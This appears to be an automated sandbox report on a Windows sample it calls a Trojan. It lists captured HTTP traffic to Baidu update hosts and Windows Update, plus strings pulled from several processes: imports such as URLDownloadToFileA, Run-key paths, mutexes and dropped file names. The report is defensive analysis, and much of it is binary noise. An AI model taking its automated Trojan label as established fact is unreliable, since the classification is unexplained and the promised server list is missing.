;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` ...@...#.U...F
:..Fe-c0...:'....<[K$...).$..3..%./..~..............w.......


POST / HTTP/1.1


Connection: Keep-Alive
Content-Length: 310
Content-Type: application/octet-stream
Host: s.x.baidu.com
Keep-Alive: timeout=600,max=1000

...z..
... " b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` .........6..c...\..N[[F2..H..R.......yOD.)...Ut.......X.]%.5......]...?>p6.%.=\..wH2.$~.w.4.y.S7N'3<..o...2.ci#..GW.....cZ...W.Q \7...u..H.X.q.H}t...;......u..H......k...j....Z1..J..
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 198
...z....... " b58974f666e28edaba3814768157053d(.........28e..kYN......
..;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` ...@.....?.S
 ....5...._...#...ww..|.ar......k.9ng~f..W.......\;.n..._.HTTP/1.1 200
 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep
-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 198.....z.
...... " b58974f666e28edaba3814768157053d(.........28e..kYN........;..
.nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` ...@.....?.S ....
5...._...#...ww..|.ar......k.9ng~f..W.......\;.n..._.....


POST / HTTP/1.1


Connection: Keep-Alive
Content-Length: 310
Content-Type: application/octet-stream
Host: s.x.baidu.com
Keep-Alive: timeout=600,max=1000

...z..
...," b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` ......Z...v_,?..........c..s.8_..*f...S..P-.................._...W....e
Q.........V..j;..Z".0.....Q
....
?...&..Om...9...o.aeb..b.
z.`..`.YI.K...o.O.%ft._.6{.7b........r..n..RY.x..g
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 198
...z.......," b58974f666e28edaba3814768157053d(.........28e..kYN......
..;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` [email protected]
Wo>Kc......W>}.[.Z..Bp?..>.k.^...=..}..a.lW..^*..........DHTT
P/1.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-str
eam..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 1
98.....z.......," b58974f666e28edaba3814768157053d(.........28e..kYN..
......;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` ...@....
...GWo>Kc......W>}.[.Z..Bp?..>.k.^...=..}..a.lW..^*..........
D....


POST / HTTP/1.1


Connection: Keep-Alive
Content-Length: 310
Content-Type: application/octet-stream
Host: s.x.baidu.com
Keep-Alive: timeout=600,max=1000

...z..
...-" b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` ........._s$.(.DYv.....=..J(
....S...]?/.....V.c...$......TGgx.....Q..,...9...c.?-...@.^.....{.....y.9..C...../..0j..................Q..]`/.&...:|..Q..f
..\...<Y....?.&6.......5Jg..
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 198
...z.......-" b58974f666e28edaba3814768157053d(.........28e..kYN......
..;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` ...@..;....T
.O....q....I..l,z .....D..........&D...'.R.....&G78oC.....HTTP/1.1 200
 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep
-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 198.....z.
......-" b58974f666e28edaba3814768157053d(.........28e..kYN........;..
.nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` ...@..;....T.O...
.q....I..l,z .....D..........&D...'.R.....&G78oC.........



POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 156
Content-Type: application/octet-stream
Host: s.x.baidu.com
Keep-Alive: timeout=600,max=1000

...x........" b58974f666e28edaba3814768157053d(.........28..7
....K.d.....Zv..S....(,.6.2...C....b.K....{[email protected].` ............i~o
E%(.1bxaK..ua
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 156
...x........" b58974f666e28edaba3814768157053d(.........28..7......K.d
.....Zv..S....(,.6.2...C....b.K....{[email protected].` ............b.
&......Q.....D.7HTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: ap
plication/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive
..Content-Length: 156.....x........" b58974f666e28edaba3814768157053d(
.........28..7......K.d.....Zv..S....(,.6.2...C....b.K....{....j...8.@
.H.P.X.` ............b.&......Q.....D.7..



POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 158
Content-Type: application/octet-stream
Host: s.x.baidu.com
Keep-Alive: timeout=600,max=1000

...z........" b58974f666e28edaba3814768157053d([email protected].(.0..=..t..............guq."..=.[[email protected]...` ......t&........^....m@{n.Fj..
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 158
...z........" b58974f666e28edaba3814768157053d([email protected].(.0..=
..t..............guq."..=.[[email protected]...` ......P.".K5
..}.....9......-.mHTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: 
application/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Ali
ve..Content-Length: 158.....z........" b58974f666e28edaba3814768157053
d([email protected].(.0..=..t..............guq."..=.[Q7....W......C..F8
[email protected]...` ......P.".K5..}.....9......-.m..



POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 390
Content-Type: application/octet-stream
Host: d.x.baidu.com
Keep-Alive: timeout=600,max=1000

...z........" b58974f666e28edaba3814768157053d(.........28..Jg.m..3E......1 ...a...\.....;V.....$..:[email protected]...` ......$t....o-T....E..u..]m.....-OV..)MA.....t..$ZJx.g...A...a..- ...t.......p8.. 5g..}..L....^..4...........Pl.D....H.X...].;.y..4xL....Y)[email protected]/.T-`...)3..l..#.~..^n..........U....H.yZ...B...,...M6.cO.C...3.t.I.GF.]...kWBi..U
....C..3.....d.!.........[X
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 150
...z........" b58974f666e28edaba3814768157053d(.........28..Jg.m..3E..
....1 ...a...\.....;V.....$..:[email protected]...` .........}.]
CXi.........



POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 78
Content-Type: application/octet-stream
Host: d.x.baidu.com
Keep-Alive: timeout=600,max=1000

...B........" b58974f666e28edaba3814768157053d([email protected]...` ......
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 134
...z........" b58974f666e28edaba3814768157053d(.........28..Jg.m..3E..
....1 ...a...\.....;V.....$..:[email protected]...` ........



GET /msdownload/update/v3/static/trustedr/en/authrootseq.txt HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: VVV.download.windowsupdate.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 12 Sep 2014 18:02:51 GMT
Accept-Ranges: bytes
ETag: "80179bc4b3cecf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 18
Cache-Control: max-age=7062
Date: Thu, 06 Nov 2014 06:07:48 GMT
Connection: keep-alive
X-CCC: CA
X-CID: 2
1401CFCEB3C4C42958....


GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1


Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: VVV.download.windowsupdate.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Fri, 12 Sep 2014 18:47:05 GMT
Accept-Ranges: bytes
ETag: "805a83f2b9cecf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 56928
Cache-Control: max-age=9525
Date: Thu, 06 Nov 2014 06:07:49 GMT
Connection: keep-alive
X-CCC: CA
X-CID: 2
MSCF....`.......,...................I.................,E.Y .authroot.s
tl..Y-..8..CK...<T...g.v!M.d..f.%d..}K..5..F. ...T..%.,YJ.,!T......
_..x.<=O.....yy....;3..>.|..~..\.....|......;..8..~.za...."A...q
.......g..m......<X........j"I........!..-w.....w....P...H..(.?}..2
.N. .u..a. ...=.C..D.F>rC.. ..|).=.. ..3b.8H.M...(...u8.%...W.g...\
YB.m:.....dE.........V....$....Dn:....0...S."...o..q.....K...I..K...(x
%....>A.R...`.0 .........<`L0mp...%....y.....g.n...R0Op..<..,
....`0$z.@..&.x"....T..H...<........~..E..".....<<.\B(.......
[email protected]/"...f.......k..Jm7j....R.5q....Rz.
.!@...].......Y.[........4.. .D8..&...t.J^O..Q.._..1.J.m5<'k.,....%
T....i.\.;.;q..S./ 8.?Bu.............}D.Q....L....*..[.."e......15m...
_.0.M........#..v!..<...@..?sc.y....*.....tX[........{.W4.Q...^u@..
*..QP.......~.L9N....2r...4.....B..-\(...b.d...K...O.8..Un.......V.<
;.......A...V.....(..s..f..q.{N0.hS.,..;M.|G|[email protected].._.....7._6...C.0...
A;L....%...M=Y.....f.JV.(.5.....0..?*...KZ....jM...8.6U...#...ew.?..?.
..........WE.Or..O>..{.'[email protected]}.o:?~....]&l
t;!...%....}@.d...L.p.a.g ..K."..N1!%..S.bT.H.-.....e..`.0$...0t..DX..
{.....#./...8.5..M...T.......D......V\C.zy.....3E:..>.{..).QW......
q....9..n..1....8%,.........r.p@.>. ...Q.?.p..7.?..7...&..!........
.`. .=....Sf..q.l.A.....L...t.}g..;...f....=.e.~.z....C..*R....H-..=..
.f..(t'.."....F...g._....n.J..U.4vr`}.....1..o@.....@.#...R. L8....z..
].|......3..y..-./....K..6{...s.<R`.}[email protected]....
<<< skipped >>>


GET /msdownload/update/v3/static/trustedr/en/authrootseq.txt HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: VVV.download.windowsupdate.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 12 Sep 2014 18:02:51 GMT
Accept-Ranges: bytes
ETag: "80179bc4b3cecf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 18
Cache-Control: max-age=7063
Date: Thu, 06 Nov 2014 06:07:47 GMT
Connection: keep-alive
X-CCC: CA
X-CID: 2
1401CFCEB3C4C42958....


GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1


Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: VVV.download.windowsupdate.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Fri, 12 Sep 2014 18:47:05 GMT
Accept-Ranges: bytes
ETag: "805a83f2b9cecf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 56928
Cache-Control: max-age=9526
Date: Thu, 06 Nov 2014 06:07:48 GMT
Connection: keep-alive
X-CCC: CA
X-CID: 2
MSCF....`.......,...................I.................,E.Y .authroot.s
tl..Y-..8..CK...<T...g.v!M.d..f.%d..}K..5..F. ...T..%.,YJ.,!T......
_..x.<=O.....yy....;3..>.|..~..\.....|......;..8..~.za...."A...q
.......g..m......<X........j"I........!..-w.....w....P...H..(.?}..2
.N. .u..a. ...=.C..D.F>rC.. ..|).=.. ..3b.8H.M...(...u8.%...W.g...\
YB.m:.....dE.........V....$....Dn:....0...S."...o..q.....K...I..K...(x
%....>A.R...`.0 .........<`L0mp...%....y.....g.n...R0Op..<..,
....`0$z.@..&.x"....T..H...<........~..E..".....<<.\B(.......
[email protected]/"...f.......k..Jm7j....R.5q....Rz.
.!@...].......Y.[........4.. .D8..&...t.J^O..Q.._..1.J.m5<'k.,....%
T....i.\.;.;q..S./ 8.?Bu.............}D.Q....L....*..[.."e......15m...
_.0.M........#..v!..<...@..?sc.y....*.....tX[........{.W4.Q...^u@..
*..QP.......~.L9N....2r...4.....B..-\(...b.d...K...O.8..Un.......V.<
;.......A...V.....(..s..f..q.{N0.hS.,..;M.|G|[email protected].._.....7._6...C.0...
A;L....%...M=Y.....f.JV.(.5.....0..?*...KZ....jM...8.6U...#...ew.?..?.
..........WE.Or..O>..{.'[email protected]}.o:?~....]&l
t;!...%....}@.d...L.p.a.g ..K."..N1!%..S.bT.H.-.....e..`.0$...0t..DX..
{.....#./...8.5..M...T.......D......V\C.zy.....3E:..>.{..).QW......
q....9..n..1....8%,.........r.p@.>. ...Q.?.p..7.?..7...&..!........
.`. .=....Sf..q.l.A.....L...t.}g..;...f....=.e.~.z....C..*R....H-..=..
.f..(t'.."....F...g._....n.J..U.4vr`}.....1..o@.....@.#...R. L8....z..
].|......3..y..-./....K..6{...s.<R`.}[email protected]....
<<< skipped >>>


POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 76
Content-Type: application/octet-stream
Host: d.x.baidu.com
Keep-Alive: timeout=600,max=1000

...@........" b58974f666e28edaba3814768157053d([email protected].` ......
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 132
...x........" b58974f666e28edaba3814768157053d(.........28..7......K.d
.....Zv..S....(,.6.2...C....b.K....{[email protected].` ........

The Trojan connects to the servers at the folowing location(s):

BindEx.exe_1568:

.text
`.rdata
@.data
.rsrc
SSShlR@
KERNEL32.dll
MSVCRT.dll
_acmdln
C:\yqkvod5\YqkEveryday.exe
*.txt
%s %s
dlinstlit.txt
URLDownloadToFileA
RegEnumKeyExW
RegDeleteKeyW
RegNotifyChangeKeyValue
RegCloseKey
RegOpenKeyExW
ShellExecuteA
ShellExecuteExA
PathIsURLW
PathIsURLA
GetProcessHeap
@BaiduAnTray.exe
{00890530-6A9F-4be2-B1BB-73F01E2BB986}
{63332668-8CE1-445D-A5EE-25929176714E}
Urlmon
@C:\yqkvod5\FilmAcc.exe
FilmAcc.exe
@*.lnk
1, 0, 0, 1
BindEx.exe

BaiduSdSvc.exe_1500:

.text
`.rdata
@.data
.rsrc
@.reloc
%d.%d.%d
libprotobuf %s %s:%d] %s
..\src\google\protobuf\stubs\common.cc
..\src\google\protobuf\message_lite.cc
CHECK failed: !coded_out.HadError():
..\src\google\protobuf\io\coded_stream.cc
..\src\google\protobuf\io\zero_copy_stream_impl_lite.cc
Content-Length:%d
s.x.baidu.com
c:\clientci\workspace\bdkv_v2.1_fix_compile\avmain_proj\Source\MiniUpdate\thirdparty\google/protobuf/repeated_field.h
c:\clientci\workspace\bdkv_v2.1_fix_compile\stable_proj\include\thirdInclude\boost/exception/detail/exception_ptr.hpp
.\update.pb.cc
%s:%u
%u.%u.%u.%u
addr %s not good...
Unsupported Media Type
HTTP Version not supported
HTTP/1.0
HTTP/1.1
1.0.0.1
.\header.pb.cc
https
ftpes
ftps
tftp
% ;?:@=&,$/-_!.~*()
System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
%s\Connection
1.0.1.1
%d.%d
d-d-d d:d:d
RegKey
CryptMsgGetParam
CryptMsgClose
CertFindCertificateInStore
CertFreeCertificateContext
CertCloseStore
CertGetNameStringW
CryptCATCatalogInfoFromContext
RootKey
SubKey
IsNative64Key
&#xX;
</%s>
%s="%s"
%s='%s'
<!--%s-->
<![CDATA[%s]]>
version="%s"
encoding="%s"
standalone="%s"
c:\clientci\workspace\bdkv_v2.1_fix_compile\basic\KVOutput\binrelease\BaiduSdSvc.pdb
?GetBDMReportMgr@BDLogicUtils@@YAPAVIBDMReportMgr@1@XZ
BDLogicUtils.dll
BDMFrameWork.dll
SHLWAPI.dll
BDMSkin.dll
GetWindowsDirectoryW
KERNEL32.dll
USER32.dll
RegOpenKeyExW
RegCloseKey
RegCreateKeyExW
ADVAPI32.dll
MSVCP80.dll
PSAPI.DLL
WS2_32.dll
MSVCR80.dll
_amsg_exit
_crt_debugger_hook
USERENV.dll
WTSAPI32.dll
SensApi.dll
InternetCrackUrlW
HttpOpenRequestW
HttpQueryInfoW
HttpSendRequestW
WININET.dll
NETAPI32.dll
VERSION.dll
SHDeleteKeyW
GetProcessHeap
GetSystemWindowsDirectoryW
RegOpenKeyExA
RegEnumKeyExW
RegQueryInfoKeyW
RegSetKeySecurity
RegGetKeySecurity
RegDeleteKeyW
RegFlushKey
RegNotifyChangeKeyValue
SHELL32.dll
ole32.dll
imagehlp.dll
BaiduSdSvc.exe
.?AV?$CSingleton@VCRtpPluginContainer@@@BDMBase@@
.?AVCRtpPluginContainer@@
.?AV?$CSingleton@VCRTPServer@@@utils@@
.?AVCRTPServer@@
.?AVCBDMOptionsReportRecord@@
.?AVCBDMLauchReportRecord@@
.?AVTSMsg@@
.?AVIBDMMsg@@
.?AVTSMsgMap@@
.?AVITSMsgMap@@
.?AVTSMsgDispatcher@@
.?AVITSMsgDispatcher@@
.?AVTSMsgStub@@
.?AVITSMsgStub@@
.?AVheader@http@bena@@
.?AVresponse@http@bena@@
.?AVrequest@http@bena@@
<assemblyIdentity type="win32" name="Microsoft.VC80.CRT" version="8.0.50727.4053" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b"></assemblyIdentity>
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>
;%;'<1<8<*=
7}8q8>9
89V9h9
3F4X4]4r4
9 9$9(9,9094989
5 6$6(6,6064686
HKEY_LOCAL_MACHINE\Software
HKEY_CURRENT_USER\Software\Classes\CLSID
HKEY_CURRENT_USER\Software\Classes\DirectShow
HKEY_CURRENT_USER\Software\Classes\Interface
HKEY_CURRENT_USER\Software\Classes\Media Type
HKEY_CURRENT_USER\Software\Classes\MediaFoundation
HKEY_CLASSES_ROOT\CLSID
HKEY_CLASSES_ROOT\DirectShow
HKEY_CLASSES_ROOT\Interface
HKEY_CLASSES_ROOT\Media Type
HKEY_CLASSES_ROOT\MediaFoundation
explorer.exe
HKEY_LOCAL_MACHINE\Software\Wow6432Node
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\CLSID
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\DirectShow
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\Interface
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\Media Type
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\MediaFoundation
HKEY_CLASSES_ROOT\Wow6432Node\CLSID
HKEY_CLASSES_ROOT\Wow6432Node\DirectShow
HKEY_CLASSES_ROOT\Wow6432Node\Interface
HKEY_CLASSES_ROOT\Wow6432Node\Media Type
HKEY_CLASSES_ROOT\Wow6432Node\MediaFoundation
\BDConfig.dll
winlogon.exe
SOFTWARE\Microsoft\Windows\CurrentVersion
ntdll.dll
BaiduSdTray.exe
"{0}\{1}" {2}
SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
EXPLORER.EXE
Global\BDKVMutex{B2F10594-7119-4649-9326-AF1890C5CE56}
Global\BDKVEvent{8C345A9A-F601-405d-AB4A-B459CD5E369E}
Global\TAV_SERVICE_{4A9CAFF9-6834-419c-AFB1-139AC49FF55E}
\\.\pipe\{5EA6312A-0014-4160-AF85-E26361D6281E}
BaiduSd.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Baidu\BaiduSd
\bdkvrtpplugins\RtpContainerConfig.xml
C:\test.exe
d-d-d d:d:d d
d:d:d
%s(%d)
Last Error : %u(%s)
\BDMAVE.dll
Global\BDKVMutex{32EB1BC7-A5CD-4356-A6B1-54D7BF690CA7}
JoinBaiduCloundPlan
\kernel32.dll
Windows 8.1
Windows 8.0
Windows 7
Windows Vista
Windows 7
Windows Vista
Windows Server 2003,
Windows XP
Windows 2000
Windows NT
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Hotfix\Q246009
Windows 95
Windows 98
Windows ME
000%x
\StringFileInfo\%s\FileVersion
BaiduSdUpdate.exe
CX
{X-X-X-XX-XXXXXX}
CD823ABCA-A92F-429d-9E11-3779B5F682AA
BDMUPDATE_{626ADED9-5989-4e97-A482-09AC95C17D47}
BDMUpdate.dll
BDMNet.dll
.bdtmp
.old_
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0
kernel32.dll
\Global.db
Aiphlpapi.dll
A\\.\PhysicalDrive%d
\\.\Scsi%d:
BHKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
oHKEY_USERS
Wintrust.dll
Crypt32.dll
Software\Microsoft\Windows NT\CurrentVersion\Time Zones\
Software\Microsoft\Windows NT\CurrentVersion\ProfileList\
Software\Microsoft\Windows NT\CurrentVersion\Print\
Software\Microsoft\Windows NT\CurrentVersion\Ports\
Software\Microsoft\Windows NT\CurrentVersion\Perflib\
Software\Microsoft\Windows NT\CurrentVersion\NetworkCards\
Software\Microsoft\Windows NT\CurrentVersion\Language Pack\
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
Software\Microsoft\Windows NT\CurrentVersion\Gre_Initialize\
Software\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\
Software\Microsoft\Windows NT\CurrentVersion\Fonts\
Software\Microsoft\Windows NT\CurrentVersion\FontMapper\
Software\Microsoft\Windows NT\CurrentVersion\FontLink\
Software\Microsoft\Windows NT\CurrentVersion\FontDpi\
Software\Microsoft\Windows NT\CurrentVersion\Console\
Software\Microsoft\Windows\CurrentVersion\Telephony\Locations\
Software\Microsoft\Windows\CurrentVersion\Setup\
Software\Microsoft\Windows\CurrentVersion\PreviewHandlers\
Software\Microsoft\Windows\CurrentVersion\Policies\
Software\Microsoft\Windows\CurrentVersion\Group Policy\
Software\Microsoft\Windows\CurrentVersion\Explorer\KindMap\
Software\Microsoft\Windows\CurrentVersion\Explorer\DriveIcons\
Software\Microsoft\Windows\CurrentVersion\Explorer\AutoplayHandlers\
Software\Microsoft\Windows\CurrentVersion\Control Panel\Cursors\Schemes\
Software\Microsoft\Windows\CurrentVersion\App Paths\
Software\Microsoft\SystemCertificates\
Software\Microsoft\EnterpriseCertificates\
system32\winlogon.exe
D6BE417DD-264A-4678-A036-74D2173ECCEB
2.1.0.3109
BaidusdSvc.exe

netsh.exe_2640:

.text
`.data
.rsrc
msvcrt.dll
ADVAPI32.dll
KERNEL32.dll
NTDLL.DLL
MPRAPI.dll
ole32.dll
OLEAUT32.dll
RASAPI32.dll
USER32.dll
iphlpapi.dll
[%S] %S
netsh.pdb
RegCloseKey
RegOpenKeyExW
RegCreateKeyExW
RegQueryInfoKeyW
GetProcessHeap
GetConsoleOutputCP
ntdll.dll
NETSH.EXE
MatchCmdLine
MatchTagsInCmdLine
{X-X-X-XX-XXXXXX}
netsh.exe
Error %d in FormatMessageW()
select * from Win32_OperatingSystem
\\%s\root\cimv2
5.1.2600.5512 (xpsp.080413-0852)
Windows
Operating System
5.1.2600.5512
LFirst, add the protocol to the transport, and then add it to the interface.
*The requested transport is not available.
%1!s! ipmontr.dll
The above command installs ipmontr.dll in netsh.
is removed, it is no longer supported by netsh.
The command cannot be executed.
*Windows cannot open the file named %1!s!.
.The commit call to %1!s! cannot be completed.
.Sets the current machine on which to operate.
name - Name of the machine on which to operate
Sets the current machine on which to operate. If a machine name
%1!s! open c:\logfiles\logfile.txt
.Error creating key for %1!s! in the registry.
.Error deleting key for %1!s! in the registry.

BaiduSdTray.exe_2844:

.text
`.rdata
@.data
.rsrc
@.reloc
PSSSSSSh
D$XPSSh
..\src\google\protobuf\message_lite.cc
CHECK failed: !coded_out.HadError():
..\src\google\protobuf\io\coded_stream.cc
%d.%d.%d
libprotobuf %s %s:%d] %s
..\src\google\protobuf\stubs\common.cc
..\src\google\protobuf\io\zero_copy_stream_impl_lite.cc
inflate 1.2.5 Copyright 1995-2010 Mark Adler
deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler
1.2.5
{C6642F75-8DBE-473d-A98B-940F84EF702C}
.\Global\ReportBase\msg.pb.cc
datapkg.FieldsList
datapkg.DataType
CreateReportClient
ReleaseReportClient
{8CEFC9E6-A2B4-4c2a-823C-6903A31139FA}
kernel32.dll
&#xX;
</%s>
%s="%s"
%s='%s'
<!--%s-->
<![CDATA[%s]]>
version="%s"
encoding="%s"
standalone="%s"
1.0.1.1
%d.%d
d-d-d d:d:d
RegKey
RootKey
SubKey
IsNative64Key
CryptMsgGetParam
CryptMsgClose
CertFindCertificateInStore
CertFreeCertificateContext
CertCloseStore
CertGetNameStringW
CryptCATCatalogInfoFromContext
Content-Length:%d
s.x.baidu.com
c:\clientci\workspace\bdkv_v2.1_fix_compile\avmain_proj\Source\MiniUpdate\thirdparty\google/protobuf/repeated_field.h
c:\clientci\workspace\bdkv_v2.1_fix_compile\stable_proj\include\thirdInclude\boost/exception/detail/exception_ptr.hpp
.\update.pb.cc
%s:%u
%u.%u.%u.%u
addr %s not good...
Unsupported Media Type
HTTP Version not supported
HTTP/1.0
HTTP/1.1
1.0.0.1
.\header.pb.cc
https
ftpes
ftps
tftp
% ;?:@=&,$/-_!.~*()
System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
%s\Connection
c:\clientci\workspace\bdkv_v2.1_fix_compile\basic\KVOutput\binrelease\BaiduSdTray.pdb
BDMSkin.dll
?GetBDMReportMgr@BDLogicUtils@@YAPAVIBDMReportMgr@1@XZ
BDLogicUtils.dll
BDMFrameWork.dll
SHDeleteKeyW
SHLWAPI.dll
GetProcessHeap
SetProcessShutdownParameters
GetWindowsDirectoryW
GetSystemWindowsDirectoryW
KERNEL32.dll
USER32.dll
GDI32.dll
RegOpenKeyExW
RegCloseKey
RegOpenKeyW
RegCreateKeyExW
RegDeleteKeyW
RegFlushKey
RegQueryInfoKeyW
RegEnumKeyExW
RegSetKeySecurity
RegNotifyChangeKeyValue
RegGetKeySecurity
ADVAPI32.dll
ShellExecuteExW
ShellExecuteW
SHELL32.dll
ole32.dll
MSVCP80.dll
MSVCR80.dll
_amsg_exit
_wcmdln
_crt_debugger_hook
PSAPI.DLL
WTSAPI32.dll
USERENV.dll
imagehlp.dll
HttpSendRequestW
InternetCrackUrlW
HttpOpenRequestW
HttpQueryInfoW
WININET.dll
NETAPI32.dll
VERSION.dll
WS2_32.dll
RegOpenKeyExA
BaiduSdTray.exe
.?AVCBDMLauchReportRecord@@
.?AVReportMessageBase@ns_reportbase@ns_global@@
.?AVRegSystemCallPassThrough@ns_common@@
.?AVReportClient@ns_reportbase@ns_global@@
.?AVTSMsg@@
.?AVIBDMMsg@@
.?AVTSMsgMap@@
.?AVITSMsgMap@@
.?AVTSMsgDispatcher@@
.?AVITSMsgDispatcher@@
.?AVTSMsgStub@@
.?AVITSMsgStub@@
.?AVheader@http@bena@@
.?AVresponse@http@bena@@
.?AVrequest@http@bena@@
<assemblyIdentity type="win32" name="Microsoft.VC80.CRT" version="8.0.50727.4053" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b"></assemblyIdentity>
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>
<%<5<\<|<
1%1X1u1{1
7-8}8&9S9x9
1/3E4
9 :-:3:|:
2!313\3|3
5%5X5l5|5
11U1]1q1
77q7
:,:6:>:`:
7&747=7]7
?0?4?8?<?
6$6,686\6|6
1$1,181\1|1
5 5$5(5,5054585\5
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE
\iexplore.exe
\Internet Explorer\iexplore.exe
%s\baidubrowser.exe
HKEY_LOCAL_MACHINE\Software
HKEY_CURRENT_USER\Software\Classes\CLSID
HKEY_CURRENT_USER\Software\Classes\DirectShow
HKEY_CURRENT_USER\Software\Classes\Interface
HKEY_CURRENT_USER\Software\Classes\Media Type
HKEY_CURRENT_USER\Software\Classes\MediaFoundation
HKEY_CLASSES_ROOT\CLSID
HKEY_CLASSES_ROOT\DirectShow
HKEY_CLASSES_ROOT\Interface
HKEY_CLASSES_ROOT\Media Type
HKEY_CLASSES_ROOT\MediaFoundation
HKEY_LOCAL_MACHINE\Software\Wow6432Node
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\CLSID
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\DirectShow
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\Interface
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\Media Type
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\MediaFoundation
HKEY_CLASSES_ROOT\Wow6432Node\CLSID
HKEY_CLASSES_ROOT\Wow6432Node\DirectShow
HKEY_CLASSES_ROOT\Wow6432Node\Interface
HKEY_CLASSES_ROOT\Wow6432Node\Media Type
HKEY_CLASSES_ROOT\Wow6432Node\MediaFoundation
%d.%d.%d.%d
ntdll.dll
EXPLORER.EXE
explorer.exe
UDP-ADM_DRVE_ISTL_FID
UDP-ADM_DRVE_OPEN_FID
bdmantivirus\BDKitUtils.dll
system32\DRIVERS\BDMWrench.sys
BDMNet.dll
BaiduHips.exe
BaiduSdSvc.exe
